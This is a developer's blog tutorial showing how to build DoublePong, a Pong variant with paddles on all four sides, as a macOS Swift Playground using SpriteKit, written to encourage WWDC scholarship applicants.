going to hopefully get a certificate issue that matches that FQDN and you would modify the HOSTS file on both servers to 127.0.0.1 citrixlicensing.mycompany. You have three options from a DNS perspective now. 1. round robin 2. Load Balancing 3. Global Load Balancing - must delegate that record You said two sites, if you want immediate recovery you delegate that FQDN to your GSLB appliance, like Netscaler, and by delegate I'm speaking to DNS. So Netscaler because SOA for that DNS record. Your internal DNS whether AD Integrated or INFOBLOX would have a delegation record configured. If you License Server Primary goes down, Netscaler immediately sends the traffic to the other Netscaler HA pair (I hope you have) at the recovery site and that traffic is forwarded to that license server. Now, if all you want is a cold spare, I would stick with the 30 day philosophy. It is waste of storage, IMO other than DRE related items. Hopefully your company has a disaster recovery plan and exercises. I do these quarterly and at that time I take cloned images of all my infrastructure components and however many XenApp servers required to meet the DRE testers. I have a recovery site where those are sent, activated on a separate network but without a change to the IP addressing. No names change, no IP's change. Sounds like you have much to consider.
https://www.experts-exchange.com/questions/28716139/Need-a-second-Citrix-license-server.html
CC-MAIN-2018-30
refinedweb
1,239
72.87
Building my WWDC Scholarship Submission On March 13 2018, Apple announced WWDC 2018. As in previous years, tickets were available via the ticket lottery, as well as Apple’s scholarship program, where 350 students apply to receive a free ticket and lodging for WWDC. Although I had just started learning Swift, I decided to try my luck and apply for a scholarship anyways. I was incredibly ecstatic to be awarded a scholarship, and in June 2018 I attended WWDC and learned a ton as well as met tons of other scholars and Apple engineers. In this blog post, I will walk through how I created DoublePong, my WWDC18 scholarship application Swift Playground. DoublePong is an adaptation of the classic Pong game, with paddles on all four sides of the screen. On the original Mac version, DoublePong is played by moving your mouse horizontally or vertically to move the paddles. On the adapted iOS version, there is support for tilting your device or using your finger to control the paddles, but this tutorial will only cover the original macOS version. ⚠️ Note: I have not modified most of the code used in this blog post since my original WWDC scholarship submission except to update it to work on the latest versions of Swift and Xcode. Some of this code does not exhibit best practices, and shouldn’t be reused, but it has been left to demonstrate how I created my original winning scholarship submission. To assist you, I have placed notices in some places where I feel this is prevalent. Getting ready Get started by creating an empty macOS Playground in Xcode (File -> New -> Playground). Then, press Command-1 or select View -> Navigators -> Show Project Navigator to show Xcode’s project navigator sidebar on the left with your Playground’s structure. To simplify some of the code in this post, I’ve created a small Swift file with some useful extensions, such as a convenient way to add multiple subviews. Click below to download this file, which is required for some of the code we’ll write later. Download Required Materials After downloading and extracting the archive, put Extensions.swift into your Playground’s Sources folder. Setting up the scene Under the hood, DoublePong uses SpriteKit, Apple’s 2D game engine. To use it, we will create a custom SKScene and present it in our playground’s ‘live view’. Enable the playground’s live view now by pressing Option-Command-Enter or clicking the overlapping circles on the top right of Xcode’s toolbar to show the Assistant Editor. Now that our playground is ready, navigate to the main playground file by clicking it in the project navigator, then add this code, which will set up our scene and show it in the live view in the Assistant Editor: import AppKit import SpriteKit import PlaygroundSupport scene.scaleMode = .aspectFit let view = NSView(frame: CGRect(x: 0, y: 0, width: 640, height: 360)) let skView = SKView(frame: CGRect(x: 0, y: 0, width: 640, height: 360)) skView.presentScene(scene) view.addSubview(skView) PlaygroundPage.current.liveView = view The above code sets the scale mode of our scene, then embeds it within a SKView which is embedded in an NSView, which we then display in the live view. You’ll notice that this code won’t compile yet, as we haven’t created the scene that we are using. To allow us to use the scene everywhere, create a new file named Global.swift in the Sources folder, where we’ll place all our global variables. ⚠️ Note: As per the note at the top of this post, some of the code shown here was written by me a long time ago, and isn’t the best. In particular, you should avoid creating global variables as this can clutter your code. They have been used here because of the relatively small size of a playground and to simplify the code. In the new file you created, make sure to import the AppKit and SpriteKit frameworks, then create a private constant for our scene: import AppKit import SpriteKit public let scene = Scene() We’re getting closer, but our playground will still fail to run, because Xcode doesn’t know what class Scene is. To fix the issue, create a new file named Scene.swift in Sources, where we’ll place all our custom scene code, where we’ll override SKScene’s default didMove(to:) function to set up our scene: public class Scene: SKScene, SKPhysicsContactDelegate { // The scene was created. Setup the game elements and start the game. override public func didMove(to view: SKView) { // Setup the world physics physicsWorld.gravity = CGVector(dx: 0, dy: 0) physicsWorld.contactDelegate = self // Create a border in the view to keep the ball inside size = CGSize(width: 1920, height: 1080) let margin: CGFloat = 50 let physicsBody = SKPhysicsBody(edgeLoopFrom: CGRect(x: margin, y: margin, width: size.width - margin * 2, height: size.height - margin * 2)) physicsBody.friction = 0 physicsBody.restitution = 0 self.physicsBody = physicsBody } } As explained in the comments, the above code sets up our physics and ‘contact delegate’, which will let us receive notifications whenever two of our sprites, such as the ball and paddles we’ll add later, collide (touch). Your playground will now run - but it’s just an empty scene! In the next section, we’ll add our sprites and allow the user to move their mouse to control the paddles. Adding the sprites Now that our playground runs, we need to add our ball and paddles, or we’ll be stuck with an empty screen! Go back to Global.swift and add the following variables, which will hold our balls and each of our paddles. The additional constant, themeColor, can be any color you’d like and will be the color of all the sprites. public let themeColor = NSColor.red public var ball = SKShapeNode(circleOfRadius: 30) public var topPaddle = SKSpriteNode() public var leftPaddle = SKSpriteNode() public var rightPaddle = SKSpriteNode() public var bottomPaddle = SKSpriteNode() public var randomObstacle = SKSpriteNode() We also need to add some bit mask variables, so that SpriteKit knows which sprite is which and can tell us when they collide. Later on, we’ll set up the paddles and balls with their bit mask and tell SpriteKit to notify us when the sprite collides with another bit mask. public let Ball: UInt32 = 0x1 << 0 public let topPaddleI: UInt32 = 0x1 << 1 public let leftPaddleI: UInt32 = 0x1 << 2 public let rightPaddleI: UInt32 = 0x1 << 3 public let bottomPaddleI: UInt32 = 0x1 << 4 public let randomObstacleI: UInt32 = 0x1 << 5 Note that these are let constants as we don’t want them to change, while our sprites are variables as we’ll set them up separately in Scene.swift. Go to it now and we’ll add a new function in which we’ll set up our ball sprite: func setupBall() { ball.name = "ball" ball.fillColor = themeColor ball.strokeColor = themeColor ball.position = CGPoint(x: CGFloat.random(in: 325...1595), y: CGFloat.random(in: 325...755)) let physicsBody = SKPhysicsBody(circleOfRadius: 30) physicsBody.velocity = CGVector(dx: 400, dy: 400) physicsBody.friction = 0 physicsBody.restitution = 1 physicsBody.linearDamping = 0 physicsBody.allowsRotation = false physicsBody.categoryBitMask = Ball physicsBody.contactTestBitMask = randomObstacleI ball.physicsBody = physicsBody } In the function, we’re setting the name of the sprite so we can easily identify it later when detecting collisions. We’re also positioning the ball at a random position within our game grid using the new CGFloat.random(in:) function introduced in Swift 4.2. We then set the ball’s SKPhysicsBody, which determines how the ball bounces and acts in the scene, specifically: - the frictionis set to 0 to avoid it slowing down when it bounces, making the game fun - the restitutionis how much energy lost when the ball bounces off another sprite - the linearDampingis set to 0 so that no damping, which simulates air friction, is applied We have now set up our ball, so if you add setupBall() to our didMove(to:) function from earlier and run the playground…… nothing happens! This is because while we have now created and set up our ball we still haven’t added it to our actual scene. We’ll set up our paddles and then return to this later, so we can add all our sprites together. To set up the paddles, we’ll add a new function named setupPaddles() where we’ll set up all of our paddles: func setupPaddles() { let randomHorizontalPosition = CGFloat.random(in: 325...1595) let horizontalPaddleSize = CGSize(width: 550, height: 50) let randomVerticalPosition = CGFloat.random(in: 325...755) let verticalPaddleSize = CGSize(width: 50, height: 550) topPaddle = createNode(color: themeColor, size: horizontalPaddleSize, name: "topPaddle", dynamic: false, friction: 0, restitution: 1, cBM: topPaddleI, cTBM: Ball, position: CGPoint(x: randomHorizontalPosition, y: frame.maxY - 50)) bottomPaddle = createNode(color: themeColor, size: horizontalPaddleSize, name: "bottomPaddle", dynamic: false, friction: 0, restitution: 1, cBM: bottomPaddleI, cTBM: Ball, position: CGPoint(x: randomHorizontalPosition, y: frame.minY + 50)) leftPaddle = createNode(color: themeColor, size: verticalPaddleSize, name: "leftPaddle", dynamic: false, friction: 0, restitution: 1, cBM: leftPaddleI, cTBM: Ball, position: CGPoint(x: frame.minX + 50, y: randomVerticalPosition)) rightPaddle = createNode(color: themeColor, size: verticalPaddleSize, name: "rightPaddle", dynamic: false, friction: 0, restitution: 1, cBM: rightPaddleI, cTBM: Ball, position: CGPoint(x: frame.maxX - 50, y: randomVerticalPosition)) } As you can see, we are first defining our sizes and some random positions for our paddles. Then, we use the helper method that was included in Extensions.swift (which you should have downloaded earlier in this tutorial) to quickly create each paddle with the size and theme color we have set earlier. The cBM is the contactBitMask, and it tells SpriteKit which of the bit masks (that we created earlier) identifies this sprite. It goes hand in hand with the cTBM, the contactTestBitMask, which tells SpriteKit which sprites it should send a collision notification for. For example, if our cTBM for the right paddle was leftPaddle, it would send a notification (which we haven’t set up yet) when it collides with the left paddle. Here, we are setting all of the test bit maps to Ball, because they will all collide with the ball. Now that we have set up all of the required sprites, go ahead and add the following line to the bottom of didMove(to:), which will add all the sprites to the scene. addChilds(ball, topPaddle, bottomPaddle, leftPaddle, rightPaddle) If you now run the playground, you’ll see the sprites are all created and the ball will start bouncing around! Mouse control Before we set up our collision detection, we need to register for mouse events, which will allow us to move the paddles based on where the user moves their mouse. We’ll create a new function named registerForMouseEvents(on:), which we can call to register for mouse events on our view: func registerForMouseEvents(on view: SKView) { let options: NSTrackingArea.Options = [.activeAlways, .inVisibleRect, .mouseEnteredAndExited, .mouseMoved] as NSTrackingArea.Options let trackingArea = NSTrackingArea(rect: view.frame, options: options, owner: self, userInfo: nil) view.addTrackingArea(trackingArea) } We are setting up our tracking options, specifically, to only get events in the visible rect, and get mouse entered, exited, and moved events. We are then using NSTrackingArea to add the tracking area to our view based on it’s frame size. Call the new function at the top of didMove(to:): registerForMouseEvents(on: view) We will now create a new function where we handle the mouse events and move the paddles accordingly. This involves quite a bit of maths and calculations to make the paddles “snap” on the edges and avoid the paddles from exiting our scene! Override the mouseMoved(with:) function, where we’ll first set up some variables to make it easier to calculate the new positions of the paddles. override public func mouseMoved(with event: NSEvent) { super.mouseMoved(with: event) /// Using different padding sizes creates a "click" when the user moves the paddle to the screen edge /// Minimum padding for "click" to activate let clickPadding: CGFloat = 65 /// Bare minimum padding for horizontal paddles let horizontalPadding: CGFloat = 25 /// Bare minimum padding for vertical paddles let verticalPadding: CGFloat = 27 /// Half the length of the paddles let halfPaddleLength: CGFloat = 275 // 550 divided by 2 /// The size of the screen let screenSize = CGSize(width: 1920, height: 1080) /// The location of the mouse let location = event.location(in: self) } I have added comments to each variable to make it clear what they all do, so you don’t get confused when calculating the paddle locations. Now, we’ll add the actual calculations below the new variables, starting with the top and bottom paddles: if location.x < screenSize.width - clickPadding - halfPaddleLength, location.x > halfPaddleLength + clickPadding { topPaddle.position.x = location.x bottomPaddle.position.x = location.x } else if location.x > screenSize.width - clickPadding - halfPaddleLength { topPaddle.position.x = screenSize.width - halfPaddleLength - horizontalPadding bottomPaddle.position.x = screenSize.width - halfPaddleLength - horizontalPadding } else if location.x < halfPaddleLength + clickPadding { topPaddle.position.x = halfPaddleLength + horizontalPadding bottomPaddle.position.x = halfPaddleLength + horizontalPadding } We are using an if statement to calculate the position based on the variables we defined earlier. If the mouse location is within the scene size (with the padding included), we’ll simply use the location for the paddles. Note how we are adding the paddle length to make sure the entire paddle is within the area. Otherwise, if the mouse location is outside the padding, we’ll use the “maximum location”, or the “minimum location” if it’s outside the padding on the left side. Using this padding system means that when the user moves their mouse to the very edge of the screen, it will snap the paddles to the max/min location, making it feel nice and clicky. We’ll do the same for the left and right paddles, following the same patterns: if location.y < screenSize.height - clickPadding - halfPaddleLength, location.y > clickPadding + halfPaddleLength { leftPaddle.position.y = location.y rightPaddle.position.y = location.y } else if location.y > screenSize.height - clickPadding - halfPaddleLength { leftPaddle.position.y = screenSize.height - verticalPadding - halfPaddleLength rightPaddle.position.y = screenSize.height - verticalPadding - halfPaddleLength } else if location.y < clickPadding + halfPaddleLength { leftPaddle.position.y = halfPaddleLength + verticalPadding rightPaddle.position.y = halfPaddleLength + verticalPadding } If you now run your playground, you will notice that moving your mouse now moves the paddles as you expected! Detecting collisions Next, we will detect collisions to increase the score when the ball hits the paddles without hitting the edges of the screen. Add a new variable to Global.swift where we can track the score: public var score = 0 We’ll then add a new function which detects collisions and acts accordingly. public func didBegin(_ contact: SKPhysicsContact) { let firstContactedBody = contact.bodyA.node?.name let secondContactedBody = contact.bodyB.node?.name // If the ball is not one of the bodies that contacted, skip everything else guard secondContactedBody == "ball" else { return } // If the ball's physics body doesn't exist, there's nothing we can do except exit guard let ballVelocity = ball.physicsBody?.velocity else { fatalError("The ball must have a physics body!") } } First, we will simply set our first and second body’s names to a variable so we can use them more easily. We’ll then make sure that one of the bodies is a ball and that is has a physics body, otherwise we can’t continue to use the collision. Then, if the first body is one of the paddles, we’ll increase the score and velocity of the ball accordingly: if firstContactedBody == "topPaddle" || firstContactedBody == "bottomPaddle" || firstContactedBody == "leftPaddle" || firstContactedBody == "rightPaddle" { let divisor: CGFloat = 40 score += Int(abs(ballVelocity.dy / divisor)) if -100...0 ~= ballVelocity.dx || -100...0 ~= ballVelocity.dy { ball.physicsBody?.velocity.dx += -300 ball.physicsBody?.velocity.dy += -300 } else if 0...100 ~= ballVelocity.dx || 0...100 ~= ballVelocity.dy { ball.physicsBody?.velocity.dx += 300 ball.physicsBody?.velocity.dy += 300 } else { let increase = CGFloat.random(in: 5...10) // Increase the velocity based on whether it's negative or not ball.physicsBody?.velocity.dx += (ballVelocity.dx < CGFloat(0)) ? -increase : increase ball.physicsBody?.velocity.dy += (ballVelocity.dy < CGFloat(0)) ? -increase : increase } } The new score is based on the current velocity of the ball (so you get more points as the score increases). We’ll also make sure the ball is going fast enough and fix it’s velocity or increase it if it is already fast enough. As you can see, we’re using ranges, such as 0...100 to make the velocity normal if the ball is going very slowly. It is required to keep the negative velocity to avoid the ball changing direction. Your playground will now run successfully, and the ball will start speeding up as you play! However, although the score is already updating, you can’t see it because we aren’t displaying it anywhere. Labels We will now add a score label to easily see our score while playing. Add a score label to our list in Global.swift: public var scoreLabel = NSTextField() We’ll also add a didSet item to our original score variable, which will automatically update the score label whenever the score changes. This lets us avoid redundant code. public var score = 0 { didSet { scoreLabel.stringValue = String(score) } } We now need to set up the new label and add it to our game view, so we’ll add a new function to Scene.swift which creates our label. We’re doing this in a separate function so we can add more labels later on. func setupLabels() { guard let frame = view.frame else { return } scoreLabel = createLabel(title: String(score), alignment: .left, size: 20.0, color: .white, hidden: false, x: 9, y: Double(frame.maxY - 24 - 9), width: 100, height: 24) } As you can see, we’re using our convenient method from Extensions.swift to create the label and set it’s properties, such as position, text alignment, text size, and color. ⚠️ Note: As per the note at the top of this post, some of the code shown here was written by me a long time ago, and isn’t the best. In particular, you should really avoid hard coding the position of elements on the screen. It works for this playground because of the fixed size of the playground. Now, we just need to call our new function and add the new label we created as a subview. Add this code to didMove(to:): setupLabels() addSubviews(scoreLabel) The playground now runs successfully, and the game now works and displays your score, updating it whenever the ball collides with one of the paddles! Lives We’re almost done building a completely functional copy of DoublePong! The last thing we need to add is lives, so that the game is over if the ball touches the edges of the screen too many times. Add a new livesLabel and it’s corresponding lives variable to Global.swift: public var livesLabel = NSTextField() public var lives = 5 { didSet { livesLabel.stringValue = String(repeating: "❤️", count: lives) } } Whenever the lives are updated, we use a special method built in to String to show a heart emoji for each of the remaining lives. As before, add a new line to setupLabels() where we’ll set up our new lives label: livesLabel = createLabel(title: String(repeating: "❤️", count: lives), alignment: .right, size: 15.0, color: .white, hidden: false, x: Double(frame.maxX - 113 - 9), y: Double(frame.maxY - 19 - 9), width: 113, height: 19) The setup is the same as we did before for the score label, using the convenient method from Global.swift. Next, we’ll add a new check to our collision detection to remove lives when the ball collides with the edge: if firstContactedBody == nil { if lives > 1 { lives = lives - 1 } else { // End game here } } If the user has more than 1 life left, we remove a life. However, if all the lives have been used up, we should end the game. However, this blog post won’t cover that. Conclusion You now have a working version of DoublePong, my WWDC18 scholarship submission! I chose to remove some features to make this blog post shorter, but I’ve added them to the example playground, available below. If you’d like, you can try to implement some features yourself such as a game over screen/restart button, then check out my code to see how I chose to implement it (which may be different from your implementation). Although DoublePong is a relatively good SpriteKit game, I also made this blog post in an attempt to encourage and help out students considering applying for a WWDC 2019 scholarship! I had an incredible experience last year and I strongly recommend anyone considering an application to go for it! I hope you enjoyed this in depth tutorial into how I built DoublePong! Make sure to subscribe below to receive future blog posts in your inbox! Have any questions or comments? Applying for a WWDC scholarship? I’d love to answer any questions you have or help you out! Just email [email protected] and I’ll try my best. Thanks for reading 🙌
https://schiavo.me/2019/building-doublepong/
CC-MAIN-2019-22
refinedweb
3,472
54.63
dotConnect for SQL Server 2.00 dotConnect for SQL Server 2.00 Ranking & Summary dotConnect for SQL Server 2.00 description dotConnect for SQL Server 2.00 formerly known as SQLDirect .NET, is an enhanced data provider for SQL Server that builds on ADO.NET technology and SqlClient to present a complete solution for developing SQL Server-based database applications. As part of the Devart database application development framework, dotConnect for SQL Server offers both high performance native connectivity to SQL Server and a number of innovative development tools and technologies.. dotConnect for SQL Server supports SQL Server 2005 (including Express editions), SQL Server 2000 and MSDE. The provider works with .NET Framework 2.0, 3.0, and 3.5, and can be used with the following development environments: - Microsoft Visual Studio 2008 - Microsoft Visual Studio 2005 - Delphi 2007 Major Features: - Enhancements: - SQLDirect .NET renamed to dotConnect for SQL Server - SQL Server 2008 supported - Renamed assemblies, namespaces, and classes Requirements: .NET Framework dotConnect for SQL Server 2.00 Screenshot dotConnect for SQL Server 2.00 Keywords Bookmark dotConnect for SQL Server 2.00 dotConnect for SQL Server 2.00 Copyright Want to place your software product here? Please contact us for consideration. Contact WareSeeker.com
http://wareseeker.com/Network-Internet/dotconnect-for-sql-server-2.00.zip/7c726ff69
CC-MAIN-2014-10
refinedweb
205
53.27